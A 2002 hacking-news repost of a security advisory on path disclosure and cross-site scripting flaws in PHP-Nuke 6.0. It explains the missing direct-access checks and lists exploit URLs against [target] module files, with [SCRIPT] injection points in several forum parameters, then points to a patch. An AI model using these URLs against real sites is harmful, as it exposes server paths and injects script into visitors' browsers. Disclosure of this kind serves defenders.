Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

by Nikola Strahija on December 16th, 2002 There is a problem in PHP Nuke 6.0 with Path disclosure and XSS.


Developpement :
같같같같같같같
The majority of the PHPNuke's files are includes in modules.php or
index.php. To prevent the direct access, PHPNuke made two kinds of safety.
The first one (e.g. in modules/Downloads/index.php) is :
---------------------------------------------------
if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly...");
}
---------------------------------------------------

The second one (e.g. footer.php ) :
------------------------------------
if (eregi("footer.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}
------------------------------------

Some files haven't these safety measures but they have security holes.

Exploits :
같같같같같
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or
http://[target]/modules/Forums/bb_smilies.php?site_font=}-->[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver

- /modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver

- /modules/Forums/editpost.php, /modules/Forums/newtopic.php,
/modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php with :
$name

- /modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1


Patch :
같같같
A patch can be found on http://www.phpsecure.org .


More details :
같같같같같같같
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

[email protected]


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »